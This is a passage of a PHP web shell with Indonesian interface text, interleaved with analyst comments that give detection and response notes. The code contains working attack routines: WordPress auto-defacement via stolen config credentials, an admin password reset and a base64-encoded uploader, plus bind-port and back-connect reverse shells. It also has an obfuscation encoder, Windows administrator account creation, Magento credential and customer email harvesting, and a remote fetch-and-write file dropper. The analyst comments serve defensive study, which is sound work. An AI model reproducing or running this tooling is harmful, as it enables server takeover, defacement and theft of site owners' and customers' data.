  3042. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3043. $www = "m.php";
  3044. $fp5 = fopen($www,"w");
  3045. fputs($fp5,$upload3);
  3046. $post2 = array(
  3047. "_wpnonce" => "$anu2",
  3048. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3049. "themezip" => "@$www",
  3050. "install-theme-submit" => "Install Now",
  3051. );
  3052. $ch = curl_init("$target/wp-admin/update.php?bom&action=upload-theme");
  3053. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3054. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3055. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3056. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3057. curl_setopt($ch, CURLOPT_POST, 1);
  3058. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3059. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3060. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3061. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3062. $data3 = curl_exec($ch);
  3063. curl_close($ch);
  3064. $y = date("Y");
  3065. $m = date("m");
  3066. $namafile = "id.php";
  3067. $fpi = fopen($namafile,"w");
  3068. fputs($fpi,$script);
  3069. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3070. curl_setopt($ch6, CURLOPT_POST, true);
  3071. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3072. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3073. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3074. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3075. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  3076. $postResult = curl_exec($ch6);
  3077. curl_close($ch6);
  3078. $as = "$target/k.php";
  3079. $bs = anucurl($as);
  3080. if(preg_match("#$script#is", $bs)) {
  3081. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  3082. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3083. } else {
  3084. echo "[-] <font color='red'>gagal mepes...</font><br>";
  3085. echo "[!!] coba aja manual: <br>";
  3086. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3087. echo "[+] username: <font color=lime>$user</font><br>";
  3088. echo "[+] password: <font color=lime>$pass</font><br><br>";
  3089. }
  3090. mysql_close($conn);
  3091. }
  3092. }
  3093. }
  3094. } else {
  3095. echo "<center><h1>WordPress Auto Deface</h1>
  3096. <form method='post'>
  3097. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  3098. <input type='text' name='script' height='10' size='50' placeholder='Hacked by pr!v@t3' required><br>
  3099. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  3100. </form>
  3101. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  3102. </center>";
  3103. }
  3104. } elseif($_GET['do'] == 'auto_dwp2') {
  3105. if($_POST['auto_deface_wp']) {
  // anucurl($sites): second definition of the same helper, declared inside the
  // 'auto_dwp2' branch. Fetches the URL in $sites with cURL and returns the
  // response body; redirects are followed, the connect timeout is 5 seconds, TLS
  // peer and host verification are disabled, and a fixed Firefox 32 User-Agent
  // string is sent. Cookies persist in 'cookie.txt' in the working directory.
  // In this branch it is also used to download the remote config files whose
  // URLs are posted in the 'link' field.
  // Detection: server-originated requests with this exact User-Agent and a
  // 'cookie.txt' written by the web server account.
  3106. function anucurl($sites) {
  3107. $ch = curl_init($sites);
  3108. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3109. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3110. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3111. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3112. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3113. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3114. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3115. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3116. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  3117. $data = curl_exec($ch);
  3118. curl_close($ch);
  3119. return $data;
  3120. }
  // lohgin($cek, $web, $userr, $pass, $wp_submit): second definition of the same
  // helper, declared inside the 'auto_dwp2' branch. Sends an HTTP POST to $cek
  // with the WordPress login form fields log, pwd, rememberme, wp-submit,
  // redirect_to and testcookie, and returns the response body.
  // Redirects are followed, TLS peer and host verification are disabled, and
  // session cookies are kept in 'cookie.txt' in the working directory.
  // Detection: a wp-login.php POST carrying the fixed User-Agent below that does
  // not correspond to any interactive browser session of a known administrator.
  3121. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3122. $post = array(
  3123. "log" => "$userr",
  3124. "pwd" => "$pass",
  3125. "rememberme" => "forever",
  3126. "wp-submit" => "$wp_submit",
  3127. "redirect_to" => "$web",
  3128. "testcookie" => "1",
  3129. );
  3130. $ch = curl_init($cek);
  3131. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3132. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3133. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3134. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3135. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3136. curl_setopt($ch, CURLOPT_POST, 1);
  3137. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3138. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3139. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3140. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3141. $data = curl_exec($ch);
  3142. curl_close($ch);
  3143. return $data;
  3144. }
  3145. $link = explode("\r\n", $_POST['link']);
  3146. $script = htmlspecialchars($_POST['script']);
  3147. $user = "pr!v@t3";
  3148. $pass = "pr!v@t3";
  3149. $passx = md5($pass);
  3150. foreach($link as $dir_config) {
  3151. $config = anucurl($dir_config);
  3152. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3153. $dbuser = ambilkata($config,"DB_USER', '","'");
  3154. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3155. $dbname = ambilkata($config,"DB_NAME', '","'");
  3156. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3157. $prefix = $dbprefix."users";
  3158. $option = $dbprefix."options";
  3159. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3160. $db = mysql_select_db($dbname);
  3161. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3162. $result = mysql_fetch_array($q);
  3163. $id = $result[ID];
  3164. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3165. $result2 = mysql_fetch_array($q2);
  3166. $target = $result2[option_value];
  3167. if($target == '') {
  3168. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3169. } else {
  3170. echo "[+] $target <br>";
  3171. }
  3172. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3173. if(!$conn OR !$db OR !$update) {
  3174. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3175. mysql_close($conn);
  3176. } else {
  3177. $site = "$target/wp-login.php";
  3178. $site2 = "$target/wp-admin/theme-install.php?upload";
  3179. $b1 = anucurl($site2);
  3180. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3181. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3182. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3183. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3184. $www = "m.php";
  3185. $fp5 = fopen($www,"w");
  3186. fputs($fp5,$upload3);
  3187. $post2 = array(
  3188. "_wpnonce" => "$anu2",
  3189. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3190. "themezip" => "@$www",
  3191. "install-theme-submit" => "Install Now",
  3192. );
  3193. $ch = curl_init("$target/wp-admin/update.php?bom&action=upload-theme");
  3194. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3195. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3196. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3197. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3198. curl_setopt($ch, CURLOPT_POST, 1);
  3199. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3200. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3201. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3202. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3203. $data3 = curl_exec($ch);
  3204. curl_close($ch);
  3205. $y = date("Y");
  3206. $m = date("m");
  3207. $namafile = "id.php";
  3208. $fpi = fopen($namafile,"w");
  3209. fputs($fpi,$script);
  3210. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3211. curl_setopt($ch6, CURLOPT_POST, true);
  3212. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3213. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3214. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3215. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3216. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  3217. $postResult = curl_exec($ch6);
  3218. curl_close($ch6);
  3219. $as = "$target/k.php";
  3220. $bs = anucurl($as);
  3221. if(preg_match("#$script#is", $bs)) {
  3222. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  3223. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3224. } else {
  3225. echo "[-] <font color='red'>gagal mepes...</font><br>";
  3226. echo "[!!] coba aja manual: <br>";
  3227. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3228. echo "[+] username: <font color=lime>$user</font><br>";
  3229. echo "[+] password: <font color=lime>$pass</font><br><br>";
  3230. }
  3231. mysql_close($conn);
  3232. }
  3233. }
  3234. } else {
  3235. echo "<center><h1>WordPress Auto Deface V.2</h1>
  3236. <form method='post'>
  3237. Link Config: <br>
  3238. <textarea name='link' placeholder='http://target.com/priv_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  3239. <input type='text' name='script' height='10' size='50' placeholder='Hacked by pr!v@t3' required><br>
  3240. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  3241. </form></center>";
  3242. }
  3243. } elseif($_GET['do'] == 'network') {
  3244. echo "<form method='post'>
  3245. <u>Bind Port:</u> <br>
  3246. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  3247. <input type='submit' name='sub_bp' value='>>'>
  3248. </form>
  3249. <form method='post'>
  3250. <u>Back Connect:</u> <br>
  3251. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  3252. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  3253. <input type='submit' name='sub_bc' value='>>'>
  3254. </form>";
  3255. $bind_port_p="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";
  3256. if(isset($_POST['sub_bp'])) {
  3257. $f_bp = fopen("/tmp/bp.pl", "w");
  3258. fwrite($f_bp, base64_decode($bind_port_p));
  3259. fclose($f_bp);
  3260.  
  3261. $port = $_POST['port_bind'];
  3262. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  3263. sleep(1);
  3264. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  3265. unlink("/tmp/bp.pl");
  3266. }
  3267. $back_connect_p="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";
  3268. if(isset($_POST['sub_bc'])) {
  3269. $f_bc = fopen("/tmp/bc.pl", "w");
  3270. fwrite($f_bc, base64_decode($bind_connect_p));
  3271. fclose($f_bc);
  3272.  
  3273. $ipbc = $_POST['ip_bc'];
  3274. $port = $_POST['port_bc'];
  3275. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  3276. sleep(1);
  3277. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  3278. unlink("/tmp/bc.pl");
  3279. }
  3280. }elseif($_GET['do'] == 'hash')
  3281. {
  3282. $submit= $_POST['enter'];
  3283. if (isset($submit)) {
  3284. $pass = $_POST['password']; // password
  3285. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
  3286. $hash = md5($pass); // md5 hash #1
  3287. $md4 = hash("md4",$pass);
  3288. $hash_md5 = md5($salt.$pass); // md5 hash with salt #2
  3289. $hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
  3290. $hash1 = sha1($pass); // sha1 hash #4
  3291. $sha256 = hash("sha256",$text);
  3292. $hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
  3293. $hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
  3294. $base64_encode = base64_encode($pass); // Base64 Encode
  3295. }
  3296. echo '
  3297. <table align="center">
  3298. <tr><td><center><h1>Password Hash</h1></center><br><br></td></tr>
  3299. <form action="" method="post">
  3300. <tr><td><strong>Masukan kata yang ingin di encrypt : </strong> <input type="text" name="password" size="40" />&nbsp</td></tr>
  3301. <tr><td><input type="submit" name="enter" value="hash"/> <br><br></td></tr>
  3302. <tr><td><h1>Hasil Hash </h1></td></tr>
  3303. <tr><td><p>Original Password : <input type=text size=50 value='.$pass.'></p></td></tr>
  3304. <tr><td><p>MD5 : <input type=text size=50 value='.$hash.'></p></td></tr>
  3305. <tr><td><p>Base64 Encode : <input type=text size=50 value='.$base64_encode.'></p></td></tr>
  3306. <tr><td><p>MD4 : <input type=text size=50 value='.$md4.'></p></td></tr>
  3307. <tr><td><p>MD5 with Salt : <input type=text size=50 value='.$hash_md5.'></p></td></tr>
  3308. <tr><td><p>MD5 with Salt & Sha1 : <input type=text size=50 value='.$hash_md5_double.'></p></td></tr>
  3309. <tr><td><p>Sha1 : <input type=text size=50 value='.$hash1.'></p></td></tr>
  3310. <tr><td><p>Sha256 : <input type=text size=50 value='.$sha256.'></p></td></tr>
  3311. <tr><td><p>Sha1 with Salt : <input type=text size=50 value='.$hash1_sha1.'></p></td></tr>
  3312. <tr><td><p>Sha1 with Salt & MD5 : <input type=text size=50 value='.$hash1_sha1_double.'></p></td></tr>
  3313. </table>';
  3314. }elseif($_GET['do'] == 'string') {
  3315. $text = $_POST['code'];
  3316. ?><center><br><b>-=[ S c r i p t E n d c o d e]=-</b><br>
  3317. <form method="post"><br>
  3318. <textarea name="code"></textarea><br>
  3319. <select size="1" name="ope">
  3320. <option value="urlencode">url</option>
  3321. <option value="base64">Base64</option>
  3322. <option value="ur">convert_uu</option>
  3323. <option value="gzinflates">gzinflate - base64</option>
  3324. <option value="jancok">str_rot13 - base64_dcode</option>
  3325. <option value="gzinflate">str_rot13 - gzinflate - base64</option>
  3326. <option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
  3327. <option value="Pelo">gzinflate - str_rot13 - base64_decode</option>
  3328. <option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  3329. </select>&nbsp;<input type='submit' name='submit' value='Encode'>
  3330. </form>
  3331.  
  3332. <?php
  3333. $submit = $_POST['submit'];
  3334. if (isset($submit)) {
  3335. $op = $_POST["ope"];
  3336. switch ($op) {
  3337. case 'base64':
  3338. $codi = base64_encode($text);
  3339. break;
  3340. case 'str':
  3341. $codi = (base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  3342. break;
  3343. case 'gzinflate':
  3344. $codi = base64_encode(gzdeflate(str_rot13($text)));
  3345. break;
  3346. case 'jancok':
  3347. $codi = base64_encode(str_rot13($text));
  3348. break;
  3349. case 'gzinflates':
  3350. $codi = base64_encode(gzdeflate($text));
  3351. break;
  3352. case 'str2':
  3353. $codi = base64_encode(str_rot13($text));
  3354. break;
  3355. case 'urlencode':
  3356. $codi = rawurlencode($text);
  3357. break;
  3358. case 'Pelo':
  3359. $codi = base64_encode(str_rot13(gzdeflate($text)));
  3360. break;
  3361. case 'ur':
  3362. $codi = convert_uuencode($text);
  3363. break;
  3364. case 'url':
  3365. $codi = base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  3366. break;
  3367. default:
  3368. break;
  3369. }
  3370. }
  3371. echo '<textarea readonly>' . $codi . '</textarea></center>';
  3372.  
  3373.  
  3374. }elseif($_GET['do'] == 'rdp') {
  // Analyst note: body of the shell's 'rdp' action. It only does anything when
  // PHP_OS starts with "win". It manages local Windows accounts by building
  // `net user` / `net localgroup` command lines and passing them to exe(), a
  // helper defined outside this excerpt (presumably a command runner — confirm).
  // Detection: net.exe/net1.exe started as a child of the web-server or PHP
  // worker process; with account-management auditing enabled, Windows Security
  // events 4720 (account created), 4732 (added to a local group), 4724
  // (password reset) and 4726 (account deleted).
  // Response: if this file is found on a Windows host, review local accounts and
  // the membership of the local administrators group for unexpected entries.
  3375. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  // 'create' form: adds a local account, then tries to add it to the
  // administrators group.
  3376. if($_POST['create']) {
  // htmlspecialchars() only HTML-encodes these values; they are then placed
  // into the command strings and the regex below as-is.
  3377. $user = htmlspecialchars($_POST['user']);
  3378. $pass = htmlspecialchars($_POST['pass']);
  // Existence test: does the name appear anywhere in the `net user` output?
  // "Sudah Ada" = "already exists".
  3379. if(preg_match("/$user/", exe("net user"))) {
  3380. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Sudah Ada</font>";
  3381. } else {
  3382. $add_user = exe("net user $user $pass /add");
  // Three spellings of the administrators group are tried, apparently to
  // cover differently localised Windows installs.
  3383. $add_groups1 = exe("net localgroup Administrators $user /add");
  3384. $add_groups2 = exe("net localgroup Administrator $user /add");
  3385. $add_groups3 = exe("net localgroup Administrateur $user /add");
  // The new credentials are written into the HTTP response in clear text.
  // $ip is set outside this excerpt.
  3386. echo "[ RDP ACCOUNT INFO ]<br>
  3387. ------------------------------<br>
  3388. IP: <font color=lime>".$ip."</font><br>
  3389. Username: <font color=lime>$user</font><br>
  3390. Password: <font color=lime>$pass</font><br>
  3391. ------------------------------<br><br>
  3392. [ STATUS ]<br>
  3393. ------------------------------<br>
  3394. ";
  // Status is judged only by whether exe() returned a truthy value.
  // "Berhasil" = "succeeded", "Gagal" = "failed".
  3395. if($add_user) {
  3396. echo "[add user] -> <font color='lime'>Berhasil Ndan</font><br>";
  3397. } else {
  3398. echo "[add user] -> <font color='red'>Gagal Ndan</font><br>";
  3399. }
  3400. if($add_groups1) {
  3401. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  3402. } elseif($add_groups2) {
  3403. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  3404. } elseif($add_groups3) {
  3405. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  3406. } else {
  3407. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  3408. }
  3409. echo "------------------------------<br>";
  3410. }
  // 'Option' form: check (1), password change (2) or deletion (3) of an
  // existing account named in r_user.
  3411. } elseif($_POST['s_opsi']) {
  3412. $user = htmlspecialchars($_POST['r_user']);
  3413. if($_POST['opsi'] == '1') {
  // Option 1: prints the raw `net user <name>` output in the response.
  // "Belum ada" = "does not exist yet".
  3414. $cek = exe("net user $user");
  3415. echo "Checking username <font color=lime>$user</font> ....... ";
  3416. if(preg_match("/$user/", $cek)) {
  3417. echo "[ <font color=lime>Sudah ada</font> ]<br>
  3418. ------------------------------<br><br>
  3419. <pre>$cek</pre>";
  3420. } else {
  3421. echo "[ <font color=red>Belum ada</font> ]";
  3422. }
  3423. } elseif($_POST['opsi'] == '2') {
  // Option 2: the password-setting command is issued first; the existence
  // check runs afterwards and only decides which message is shown.
  3424. $cek = exe("net user $user indoxploit");
  3425. if(preg_match("/$user/", exe("net user"))) {
  3426. echo "[change password: <font color=lime>pr!v@t3</font>] -> ";
  3427. if($cek) {
  3428. echo "<font color=lime>Berhasil</font>";
  3429. } else {
  3430. echo "<font color=red>Gagal</font>";
  3431. }
  3432. } else {
  3433. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Belum ada</font>";
  3434. }
  3435. } elseif($_POST['opsi'] == '3') {
  // Option 3: the delete command is issued first, then `net user` is listed
  // again to choose the message.
  3436. $cek = exe("net user $user /DELETE");
  3437. if(preg_match("/$user/", exe("net user"))) {
  3438. echo "[remove user: <font color=lime>$user</font>] -> ";
  3439. if($cek) {
  3440. echo "<font color=lime>Berhasil</font>";
  3441. } else {
  3442. echo "<font color=red>Gagal</font>";
  3443. }
  3444. } else {
  3445. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Belum ada</font>";
  3446. }
  3447. } else {
  3448. //
  3449. }
  3450. } else {
  // No form submitted: render the two forms. The create form is pre-filled
  // with a default username and password.
  3451. echo "-- Create RDP --<br>
  3452. <form method='post'>
  3453. <input type='text' name='user' placeholder='username' value='pr!v@t3' required>
  3454. <input type='text' name='pass' placeholder='password' value='pr!v@t3' required>
  3455. <input type='submit' name='create' value='>>'>
  3456. </form>
  3457. -- Option --<br>
  3458. <form method='post'>
  3459. <input type='text' name='r_user' placeholder='username' required>
  3460. <select name='opsi'>
  3461. <option value='1'>Cek Username</option>
  3462. <option value='2'>Ubah Password</option>
  3463. <option value='3'>Hapus Username</option>
  3464. </select>
  3465. <input type='submit' name='s_opsi' value='>>'>
  3466. </form>
  3467. ";
  3468. }
  3469. } else {
  // Non-Windows host: prints a "not Windows" message and does nothing else.
  3470. echo "<font color=red>Bukan Windows Ndan -_-.</font>";
  3471. }
  3472. }elseif ($_GET['do'] == 'magento'){
  3473. echo '
  3474. <Center><h2 a>SC Leaking Magento</h2 a>
  3475. <form action="" method="post">
  3476. <input type="text" value="'.$dir.'/app/etc/local.xml" name="shcpatch" placeholder="http://localhost/" class="boxtitle">
  3477. <select class="boxtitle" name="cms">
  3478. <option>Magento</option>
  3479. </select>
  3480. <input class="boxtitle" type="submit" name="submit" value="Scan Now!"/>
  3481. </form>
  3482. </Center>';
  3483. error_reporting(0);
  // Analyst note: helper class used by the shell's 'magento' action. It reads a
  // file from a caller-supplied path, pulls database connection settings out of
  // it with regular expressions, connects to that database and collects e-mail
  // columns from a fixed list of tables.
  // Detection: reads of app/etc/local.xml by the web-server account, and
  // `SELECT *` statements against the tables listed in shc_dbg() arriving in a
  // burst from the application's database user.
  // Response: if this code ran on a host, treat the database credentials in the
  // store configuration as disclosed (rotate them) and treat the e-mail
  // addresses in the listed tables as exposed.
  3484. class shc
  3485. {
  // Deletes the file named by the basename of PHP_SELF, resolved against the
  // current working directory — in effect the script removes itself, so a
  // missing file on disk does not show that the host was never compromised.
  3486. public function drop(){
  3487. unlink(basename($_SERVER['PHP_SELF']));
  3488. }
  // Returns the contents of $location via file_get_contents(); no validation of
  // the path is done here.
  3489. public function get($location){
  3490. $shc = file_get_contents($location);
  3491. return $shc;
  3492. }
  // Returns $data with duplicate values removed (array_unique).
  3493. public function dpremove($data){
  3494. $shcUniX = array_unique($data);
  3495. return $shcUniX;
  3496. }
  // Returns a summary line containing the number of collected entries. It
  // builds and returns the string; it does not print it.
  3497. public function count($data){
  3498. return "------------ Total Email : [ ".count($data) . " ]------------\r\n";
  3499. }
  // Runs four regular expressions over $data looking for <host>, <username>,
  // <password> and <dbname> elements, and returns the first capture of each as
  // a JSON object under the key 'shc_db'. Match results are not checked before
  // index [1] is read.
  3500. public function dbmagento($data){
  3501. $shc_regexhost = "/<host><![CDATA[]+(.*?)[]]]><\\/host>/";
  3502. $shc_regexusername = "/<username><![CDATA[]+(.*?)[]]]><\\/username>/";
  3503. $shc_regexpassword = "/<password><![CDATA[]+(.*?)[]]]><\\/password>/";
  3504. $shc_regexdatabase = "/<dbname><![CDATA[]+(.*?)[]]]><\\/dbname>/";
  3505. preg_match($shc_regexhost, $data, $shcleak_1);
  3506. preg_match($shc_regexusername, $data, $shcleak_2);
  3507. preg_match($shc_regexpassword, $data, $shcleak_3);
  3508. preg_match($shc_regexdatabase, $data, $shcleak_4);
  3509. $shc_host = $shcleak_1[1];
  3510. $shc_user = $shcleak_2[1];
  3511. $shc_pass = $shcleak_3[1];
  3512. $shc_db = $shcleak_4[1];
  3513. $shc_json = array(
  3514. 'host' => $shc_host,
  3515. 'username' => $shc_user,
  3516. 'password' => $shc_pass,
  3517. 'database' => $shc_db,
  3518. );
  3519. return json_encode(array('shc_db' => $shc_json)
  3520. );
  3521. }
  // Takes the raw configuration text, extracts the credentials via
  // dbmagento(), prints them, connects to the database and returns the
  // de-duplicated list of values read from the e-mail columns.
  3522. public function shc_dbg($data){
  // dbmagento() is declared as an instance method but is called statically.
  3523. $jdata = json_decode(shc::dbmagento($data),true);
  // The extracted username and password are echoed into the HTTP response in
  // clear text. Both branches print the literal label "localhost"; only the
  // colour differs.
  3524. if($jdata['shc_db']['host']=="localhost"){
  3525. echo '<br><center> Host : <font color="red">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center> <br>';
  3526. }else{
  3527. echo '<br><center>Host : <font color="green">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center><br>';
  3528. }
  // Connects with the legacy mysql_* API, which was removed in PHP 7.0; whether
  // this path could run at all therefore depends on the host's PHP version.
  3529. mysql_connect($jdata['shc_db']['host'], $jdata['shc_db']['username'],$jdata['shc_db']['password']);
  3530. mysql_select_db($jdata['shc_db']['database']);
  // Table name => full-table query. These nine table names are the
  // database-side indicators for this routine.
  3531. $query = array(
  3532. 'admin_user' => 'SELECT * FROM admin_user' ,
  3533. 'aw_blog_comment' => 'SELECT * FROM aw_blog_comment' ,
  3534. 'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients' ,
  3535. 'customer_entity' => 'SELECT * FROM customer_entity' ,
  3536. 'newsletter_subscriber' => 'SELECT * FROM newsletter_subscriber' ,
  3537. 'newsletter_template' => 'SELECT * FROM newsletter_template' ,
  3538. 'sales_flat_order_address' => 'SELECT * FROM sales_flat_order_address' ,
  3539. 'sales_flat_quote' => 'SELECT * FROM sales_flat_quote' ,
  3540. 'sales_recurring_profile' => 'SELECT * FROM sales_recurring_profile'
  3541. );
  3542.  
  // Table name => key read from each fetched row.
  3543. $shcolom = array(
  3544. 'admin_user' => 'email' ,
  3545. 'aw_blog_comment' => 'email' ,
  3546. 'core_email_queue_recipients' => 'recipient_email' ,
  3547. 'customer_entity' => 'email' ,
  3548. 'newsletter_subscriber' => 'subscriber_email' ,
  3549. 'newsletter_template' => 'template_sender_email' ,
  3550. 'sales_flat_order_address' => 'email' ,
  3551. 'sales_flat_quote' => 'customer_email' ,
  3552. 'sales_recurring_profile' => 'SELECT * FROM admin_user'
  3553. );
  // Every row of every table is fetched; one value per row is appended to
  // $mail. Query failures are not checked.
  3554. foreach ($query as $shc_key => $shc_query) {
  3555. $hasil = mysql_query($shc_query);
  3556. while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
  3557. $mail[] = $kolom_db[$shcolom[$shc_key]];
  3558. }
  3559. }
  3560. return shc::dpremove($mail);
  3561. }
  3562. }
  // Analyst note: statements that run whenever the 'magento' action is
  // requested. Any authentication gate sits outside this excerpt.
  3563. error_reporting(0);
  // Before any form check, the content fetched for the `shcpatchl` query
  // parameter is written to the path given in the `shcpatch` query parameter.
  // Both values come straight from the query string. Detection: these two
  // parameter names in access logs, and files newly created by the web-server
  // account at matching times.
  3564. file_put_contents($_GET['shcpatch'], file_get_contents($_GET['shcpatchl']));
  // Form handler: reads the file named in the POSTed `shcpatch` field, passes
  // it to shc::shc_dbg() and echoes every returned value into the response.
  // The string returned by shc::count() is discarded.
  3565. if($_POST['submit']){
  3566. $data = shc::get($_POST['shcpatch']);
  3567. $data = shc::shc_dbg($data);
  3568. shc ::count($data);
  3569. foreach ($data as $value) {echo $value."\r\n";}
  3570. echo '
  3571. <center><br>
